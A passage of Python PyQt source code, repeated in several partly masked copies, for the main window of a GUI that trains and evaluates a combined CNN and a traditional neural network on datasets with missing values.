self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n <function token>\n <function token>\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n <function token>\n <function token>\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n <function token>\n <function token>\n <function token>\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n 